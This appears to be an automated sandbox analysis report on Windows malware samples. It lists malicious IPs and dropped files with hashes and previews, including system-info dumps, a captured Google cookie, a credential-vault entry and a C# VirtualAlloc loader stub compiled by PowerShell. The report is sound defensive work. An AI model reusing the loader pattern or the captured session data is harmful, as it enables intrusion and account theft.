Bdxi4IJGUJ.exe | malicious | 116.121.62.237
N1hAmPNziA.exe | malicious | 116.121.62.237
x86 | malicious | 210.122.109.197
XS8m26L2Vn.exe | malicious | 116.121.62.237
                                                        No context
                                                        No context
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):91
                                                        Entropy (8bit):3.964980110923723
                                                        Encrypted:false
                                                        SSDEEP:3:ApEeKm8RKQB2LI/cAtAFqyLAIRlKFvBFGmWLn:ApEVNB2LI/xyFqyLbgzGdn
                                                        MD5:99BDE3452748E34D6C50275110A6A8D4
                                                        SHA1:E79CB2A8DB7D8490523529D3861F95BA73A20C23
                                                        SHA-256:D07311ACF641866E7E84823D2962F593BB655792301DC61AD6F0C6869D9C5937
                                                        SHA-512:19FD529C6FE60BBBE3710FED93F14D723A13AD427431F855ED84F5E5E496B9F3EB8A6E8C31D740239EB225753D52A4F464B489FDBDEFF4477480026263D0F691
                                                        Malicious:false
                                                        Preview:Cookies are no longer stored in files. Please use Internet*Cookie* APIs to access cookies.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):11606
                                                        Entropy (8bit):4.8910535897909355
                                                        Encrypted:false
                                                        SSDEEP:192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ
                                                        MD5:F84F6C99316F038F964F3A6DB900038F
                                                        SHA1:C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1
                                                        SHA-256:F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E
                                                        SHA-512:E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31
                                                        Malicious:false
                                                        Preview:PSMODULECACHE.....7B\.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope................a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........3......[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1192
                                                        Entropy (8bit):5.325275554903011
                                                        Encrypted:false
                                                        SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                                                        MD5:05CF074042A017A42C1877FC5DB819AB
                                                        SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                                                        SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                                                        SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                                                        Malicious:false
                                                        Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):120
                                                        Entropy (8bit):4.524106603776786
                                                        Encrypted:false
                                                        SSDEEP:3:cPaRhARtt7TSjjhThARtuV/gR01I1/v:oMWbtChWb0gR1/v
                                                        MD5:DF83C2808C7F54E162CE6A66507FBBBE
                                                        SHA1:B8E6CA152AFA7142F928BEF5849C4C54708138C8
                                                        SHA-256:23EB89272AD3DA25605683EA7B3691FA5F76508B19870F023AD55E9FAEE8D1B8
                                                        SHA-512:078BCF94F0EC71037319D9E90A0F60BE335BECFBBC6C60CB05FA5CBF3C3187245E7C9270E8A7F8C90DB8D2391D20DD6A7726EA60B8921ADC1B67144CC19CD233
                                                        Malicious:false
                                                        Preview:Server: dns.opendns.com..Address: 208.67.222.222....Name: myip.opendns.com..Address: 102.129.143.40....-------- ..
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):51527
                                                        Entropy (8bit):4.037117443902078
                                                        Encrypted:false
                                                        SSDEEP:1536:WMo5mDUI+p0C7fZtPWS2/4CXW+kmwjlC4xuLGdv/ltLDH6i2GawcWGuwZtuKbuYF:WMgB9QD
                                                        MD5:C7A2F628DCF3F85CE0F22072367AB241
                                                        SHA1:B271D32EA3E80C7032905E77C8CFB204D4586646
                                                        SHA-256:617784E5DC452EF14C733D51EF3C1C78FF227BDE7FBC0EF185518405D0A74744
                                                        SHA-512:73D9D8445C72B49F7AFD38E5E3F58A26A3FFBA258F8B27A8387729978E0446F92F1FADC10409E3248714B97B8904F1C7D509C06E223897A4AE709CD3286ED772
                                                        Malicious:false
                                                        Preview:..Host Name: computer..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.17134 N/A Build 17134..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: pratesh..Registered Organization: ..Product ID: 00330-71388-77104-AAOEM..Original Install Date: 6/27/2019, 3:49:21 PM..System Boot Time: 2/26/2022, 10:41:46 AM..System Manufacturer: 9KPUUrhOTYlp6ub..System Model: lfvCW2wz..System Type: x64-based PC..Processor(s): 1 Processor(s) Installed... [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz..BIOS Version: 9LT2K L88M8, 6/25/2021..Windows Directory: C:\Windows..System Directory: C:\Windows\system32..Boot Device: \Device\HarddiskVolume2..System Locale:
                                                        Process:C:\Windows\System32\cmd.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):2192
                                                        Entropy (8bit):4.508807162396169
                                                        Encrypted:false
                                                        SSDEEP:48:LjmD3CNY2+3JxGK/JIjW37Xi7ZkgTMyErcCGuJUbCFRZC:LjmDyu2uHEN2ad+USy
                                                        MD5:283BF832B79AAEB537B565120932F2A5
                                                        SHA1:B54B0319174E531BB29691F54DEB21A27923EBFF
                                                        SHA-256:FD249DEFC2ED59284514EB5E6422E241B23C964C1C0F5B20A1082A866939CD5B
                                                        SHA-512:9C73F3DECB76FEEBE10CF72A744FFD5F115BF30FEA811056927A6DCB7D6412A31ED22764814F9B1F79B7FAA9127B00B421F89E345EF11E4483C3E2875E9ED3D6
                                                        Malicious:false
                                                        Preview:..Host Name: computer..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.17134 N/A Build 17134..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type: Multiprocessor Free..Registered Owner: pratesh..Registered Organization: ..Product ID: 00330-71388-77104-AAOEM..Original Install Date: 6/27/2019, 3:49:21 PM..System Boot Time: 2/26/2022, 10:41:46 AM..System Manufacturer: 9KPUUrhOTYlp6ub..System Model: lfvCW2wz..System Type: x64-based PC..Processor(s): 1 Processor(s) Installed... [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2195 Mhz..BIOS Version: 9LT2K L88M8, 6/25/2021..Windows Directory: C:\Windows..System Directory: C:\Windows\system32..Boot Device: \Device\HarddiskVolume2..System Locale:
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:Zip archive data, at least v2.0 to extract
                                                        Category:dropped
                                                        Size (bytes):228
                                                        Entropy (8bit):5.658648125232449
                                                        Encrypted:false
                                                        SSDEEP:3:vhjnl/lk/Pty7doMLz+iFmoATVffEjxdHIcX6HXIlfzUU2v9qInll1/lk/Pty/lb:5jttz+mmRVXYxdocX2Il6nlzkOVl+lIn
                                                        MD5:FDFBDE5D49536CED9C27DB86286777E2
                                                        SHA1:0D2786D903F7F23EA42737469CCE0B692FEFE216
                                                        SHA-256:28D47152041EFA538E81BD143B621254D43ABAE88B5B0B3E917B266698633AB1
                                                        SHA-512:028650BB005585508CAD066C56C1B298984F9820F7E8689AD9F715C790C34EA40C48225C1D478B2A1942C1266420FBC11CACE4C1C9991B0AFE5142A376EB0325
                                                        Malicious:false
                                                        Preview:PK............@...t...........D8E.bin..1..@...@...,$e`..).....v.r.=vWC~.....f.....Y..3Cu.G.Lcd..qY ......b2.#.Y..;.......k..}c.XO.I..}v.9?.Hh..%.^.PK..............@...t.........................D8E.binPK..........5.........
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:Zip archive data, at least v2.0 to extract
                                                        Category:dropped
                                                        Size (bytes):412
                                                        Entropy (8bit):6.836864258334393
                                                        Encrypted:false
                                                        SSDEEP:12:5jxf4sSBMtothqUWWWUXbeuj29Trx/f5Yajtn:9xf4sSBCqAWWnTpfJtn
                                                        MD5:49B7CE4DF08EEAA8EF83CBD75C92B206
                                                        SHA1:B821F695DA61B19831C426030128FE752FBEB158
                                                        SHA-256:DB4726A19EB763CD9C9C93A28E3A9F621DBFA19813B4A5141D54952DB3A7C659
                                                        SHA-512:5A6BC3BE9652FAC414C510E285318AD513969DD470588569A84A1A12E247E02BC28A8441AD49DB9B535EE76BA86ABE07E85E5863F103858F215EB8EA1E3AC1A5
                                                        Malicious:false
                                                        Preview:PK............X4..,...z.......C9B.bin=.]o.0...K.....Iv..:D.3..T.J[.Vq......O....h.\... \.......`.r....EE.G.4&]M.,..!....m .6...J..%...}.UK4.....Q:s...(.M5...Ozl5..G..1...UC....>._.J.H.....J=\.>....36....,*;kU.~FKo.B|/ph.3..h.c..A......*4...9T.._\ys..4_...3._$=!..{.../w.IbB..o.=R...dY..7kN.?q.(Mn|.jE....;.c.o}zQ.e.._.PK..............X4..,...z.....................C9B.binPK..........5...Q.....
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:Zip archive data, at least v2.0 to extract
                                                        Category:modified
                                                        Size (bytes):9373
                                                        Entropy (8bit):7.969688687051471
                                                        Encrypted:false
                                                        SSDEEP:192:zOYOv4MyLGQcHMHrVF6xsxIAQib5UwMA2Gp5XJe5r:Uv4rUHgrj6sSAlLRrXJex
                                                        MD5:DC2925093A6793DB90E71F34D0DA9D51
                                                        SHA1:B50166DDC6DDCAFF7644C37EEF03DC71B3BB22A7
                                                        SHA-256:514D4B65B3BCB2059C0D908963FB7CF8A9BE3C9BA0D575462186E01B51DE03F8
                                                        SHA-512:161691FCEDCAEAF6A3E834F78645E3E09A7D1DB69FC78FB49DB2DB38999A5554BB12EC664CC0F65C8A5B2A3BE8879502DA6C4229681BB616C4E3A8CEE81D7ADA
                                                        Malicious:false
                                                        Preview:PK..............}-$..G.......E09.bin.}{s.....|....l......%J.6..#.v.R..I..u...;5....)K2.0g.9.....D..h4.......e.....a..O./....z.~_z...<. .];..p...n..O. .........7.^...3.L.K.*\.k.(s=G 4i6..lm.i.....w..8.c+.p.b..kw..wjM.......$..c.VM.._..n.3/u.8.Q...0..z.n.6n...9..S..*./E..L.....%7..D..N...J...(".Z..: mQ.h..d.L....,O......:|.m.;...(.?..:..%.....0...0L....0.\.F.,..._.......!........f.w/.e....A.^7..n|/?..|.`..vVV..2.D$T....{OJB....9{.N8..?.../...y=U.Z...=.0.2.(r....>. s.D....,...|..fG.vx....W..|......s.P{.....K.n|..Z...S.....".'x.u.s.Wb|.o?\Z....].e>....m..k..N...$.xn..>..n.....t...w. ....j..L.7.`......o.t!.....S..O..........G..........(.,..a..c.....0G~)5....l.....\.Zy....'I.....8.j..g.t..9.~....J....^wp.Y .&....rdX.$L]..K...R.a.#.t....@............d....p.....]..b-xxe./.t.>..N..3...5J....cP...$.z6....a.Q...z%|v7..e...0.@....zU...$...Tdh._..a...sH..C.V3C..'.C.(..h...|&..g...F.6k4./..v_..(..b-v..=.)0l`*...@...<.(H.|l..`.`..B..0yNQ...<.F.s].W.B
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with very long lines, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):378
                                                        Entropy (8bit):5.599881960561245
                                                        Encrypted:false
                                                        SSDEEP:6:YM6jkk4RTML/pU98M7ETSHp926Sfp2LiGhFEbhTqKxUNHdHZ2HmwhZZZHwFnAVN:YJkk4RoL/p4vE6UxfELiKwsb9HZ2pHRL
                                                        MD5:4CFD7AAC201D285D1EB218F0043BB0E8
                                                        SHA1:37A3071C28DCB2D07F0FFFB4AB00863A3A396C03
                                                        SHA-256:ED0EFDBE241441D7C0A2C23B612916F757E935F5970EC2BAE86744F659D01E75
                                                        SHA-512:80FAF7B9B4E3A749F186F4E9E5E0F230EE20ED95CAA028621B262D86F69470BCC66BC19E5FD81E5C70DF7042C1F6C7FE81EBE4521F24E018F74B859CD02C79CC
                                                        Malicious:false
                                                        Preview:{"id":0,"agent":"CR","domain":".google.com","expirationDate":1617262195,"hostOnly":false,"httpOnly":true,"name":"NID","path":"/","sameSite":"false","secure":true,"session":false,"storeId":"0","value":"204=TAJoBZJmGymg7hmIhx3Pl2B_ihALX0aygaD3k_6aC7ZxEK7XXCNSCdw1ngcPD2GKb8blK9BMvnrjIC7LQudAB_6nqtij7uM-AmmmXBhTbFN20087xdr3Z7uOpVj33C0KRQne2C-F8m9XNwnFH3I5zkA8uxAkwvE0BSBiqum7_78"}
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):176
                                                        Entropy (8bit):4.832266387295497
                                                        Encrypted:false
                                                        SSDEEP:3:1D3YJkcidTWXH+CDcNY7gwWASAcX4CDcNY7gwWARKaJFvVoXxOkcidcWSKXBFvn:uJkcilWXeCQNY7gZASAbCQNY7gZAdJFm
                                                        MD5:7F4BAB53E86D1F77B9A69B4BEC3ED22A
                                                        SHA1:66D613BD2DCD6743C4185C09BFD1CA40B0964C88
                                                        SHA-256:F5CE776775D9EBFBEA69837550D59204A8521B9553EB243656A7B12FF5D57D11
                                                        SHA-512:0139A01E0170D7CFBE3BDA0D8307D49DAB442976A5E61F02993B139BF53C23639F162FF8B5842792FE76812CD798B649F567BECDA88699523688A4C3A34C39A3
                                                        Malicious:false
                                                        Preview:type=ED, name=02mhakedhkeskfde, address=MicrosoftAccount:target=SSO_POP_Device, server=MicrosoftAccount:target=SSO_POP_Device, port=0, ssl=0, user=02mhakedhkeskfde, password=..
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                                        Category:dropped
                                                        Size (bytes):1328
                                                        Entropy (8bit):3.9888712937502846
                                                        Encrypted:false
                                                        SSDEEP:24:H1e9E2+fPtDfHFuQhKdNWI+ycuZhNH3akSUgPNnq9qd:XJlzKd41ulH3a3U4q9K
                                                        MD5:891E8CF61EBFAA4D51E0B4A09BFC9262
                                                        SHA1:930D5FC6BE5A83C6B643D811DD307FDF0494C706
                                                        SHA-256:814C5C14ADFEB94477037E31E2F9BD44F0D161B8A4948F2B511F64C0A58DAFBF
                                                        SHA-512:3FCDF82BAF065AD24CEB7C66017A50E92A76F110AD2A682F5DC56ADE73735B87EB105956AAF4D2FA5123621A234993E90D8A7739874861399FC8AF1E43F06156
                                                        Malicious:false
                                                        Preview:L...~.rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP...............Hr;(.wSRz2..2,..........4.......C:\Users\user\AppData\Local\Temp\RES3A11.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.k.p.r.d.3.x.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                                                        Category:dropped
                                                        Size (bytes):1328
                                                        Entropy (8bit):3.984342590329363
                                                        Encrypted:false
                                                        SSDEEP:24:Hfe9E2+f6S5DfH0hKdNWI+ycuZhN6akSyPNnq9qd:Bv9mKd41ul6a3eq9K
                                                        MD5:DBC97AAABA8982682A073E1F6DC665C1
                                                        SHA1:536B1F147A18FF1467E49FD670E4F79F8466B371
                                                        SHA-256:944E5CB56A02CD6CD0773F1FBAF4F3D598AA0227DFB6169B59608EFC9DE5D98D
                                                        SHA-512:70829F56521DC9C98776F4D35D8FDD0E525EBF13DF9C18A33E3946BF7084A20A797C24E2B49E58271142EC10A6E756D839B999EABAE96810035323AF30930EC4
                                                        Malicious:false
                                                        Preview:L.....rb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP...............D*{_sd.p.:.bW............4.......C:\Users\user\AppData\Local\Temp\RES5431.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.y.z.n.o.k.x.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Preview:1
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:MSVC .res
                                                        Category:dropped
                                                        Size (bytes):652
                                                        Entropy (8bit):3.1131838152508884
                                                        Encrypted:false
                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry8ak7YnqqyPN5Dlq5J:+RI+ycuZhN6akSyPNnqX
                                                        MD5:442A7B5F7364FA70EE8E3AD06257EF01
                                                        SHA1:EB70DAFCE9B42DDE723E87C1D4E0FB00C92EB40A
                                                        SHA-256:19A46984BFBCA971C3C72A4473E74D5FFCBEF75024382D9B09EDFC8FEA028C7F
                                                        SHA-512:98E5329A3692507E6A18741175846B6D6A76F58A24073025759CE20C0E9DFE0316774E5B51C513D8C02EC840664594EEF8A6A851EBF20DDF8AE9813D1EAD14F2
                                                        Malicious:false
                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.y.z.n.o.k.x.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.y.z.n.o.k.x.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text
                                                        Category:dropped
                                                        Size (bytes):392
                                                        Entropy (8bit):4.988829579018284
                                                        Encrypted:false
                                                        SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                                                        MD5:80545CB568082AB66554E902D9291782
                                                        SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                                                        SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                                                        SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                                                        Malicious:false
                                                        Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):369
                                                        Entropy (8bit):5.26479255454489
                                                        Encrypted:false
                                                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fXus0zxs7+AEszIwkn23fXuy:p37Lvkmb6KRffu3WZEiffuy
                                                        MD5:3A3B00B94E0B79EF22728B1A7FE98FA8
                                                        SHA1:3B07F3391A6398D4307CBB156E78908A3FD144CB
                                                        SHA-256:59645E418E08488C8010F2CEA8259963463A9EDD80D56B3EEC36D4F83941CCEC
                                                        SHA-512:FFB6E269A9E6D3CD155AE246FA6115B3AD16AA6C58A09B6480F7A9E457DED43B39D7511B5A70179ED58BE9AB8FFD7D0C0E1D88F7FFE04EC508594D3AAD46E34D
                                                        Malicious:false
                                                        Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.0.cs"
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):3584
                                                        Entropy (8bit):2.597367616720797
                                                        Encrypted:false
                                                        SSDEEP:24:etGSs/u2Bg85z7xlfwZD6egdWqtkZf+YP38FWI+ycuZhN6akSyPNnq:61Yb5hFCD6fWdJ+Yv8Q1ul6a3eq
                                                        MD5:05D321F29278AB204135CE4318DA43DE
                                                        SHA1:BF2BA1B03308E4DC8F4752E8AC20D6F3A5E555A0
                                                        SHA-256:1ED702400166E5CF4B6633A7E27A2A280EBA2106926AFE247739D768E99DAD9C
                                                        SHA-512:EDB677275B5DB2205FA3DAAE5C428CC018CC7BC77A2A2C16533F83F2829308B64DAE8F4F160DBFFA997127DDF4FA63C8A6F885556CF0EC4AD9D41469B2896CB4
                                                        Malicious:false
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....rb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                                        Category:modified
                                                        Size (bytes):866
                                                        Entropy (8bit):5.342582156847717
                                                        Encrypted:false
                                                        SSDEEP:24:AId3ka6KRffukEiffurKaM5DqBVKVrdFAMBJTH:Akka6CREuIKxDcVKdBJj
                                                        MD5:2E43C2C9F10216D05447C47E401EA080
                                                        SHA1:4406C4A0FBA4CD769CDCB4A91ACF931E527E88D8
                                                        SHA-256:27EC3B2FFC4EA97ADC031A783C8F9C1232F73CACD297C77581575F84253C46A7
                                                        SHA-512:ECB81C0381F69948C2B53E408BBE6E9AE92EC81524213F51CD5FCE06F89E1E12806E62377ECBD5428CC0A50BACF666BB832488C4B7EE42EF9637A429AFBEF370
                                                        Malicious:false
                                                        Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                        File Type:MSVC .res
                                                        Category:dropped
                                                        Size (bytes):652
                                                        Entropy (8bit):3.119272920863618
                                                        Encrypted:false
                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grylWOak7YnqqUWPPN5Dlq5J:+RI+ycuZhNH3akSUgPNnqX
                                                        MD5:48723B28EEA47753527A32A9E3B1322C
                                                        SHA1:E7CD0D5366F4F0B7010764B7E903363858FCDAA7
                                                        SHA-256:2F7D0427BFF06099BF89A296D019DA107C9D250C327E264E7A0BDC68DB163EB4
                                                        SHA-512:F3DEA9E54C7A45B4B3ED0A4EF4324B59DC4E8FF4C0D5F9E2C9BFC362C69F4C8DAC8137EBD6D3E2AE781A988815A67512F06E33212E9120FEB1D15814203F628F
                                                        Malicious:false
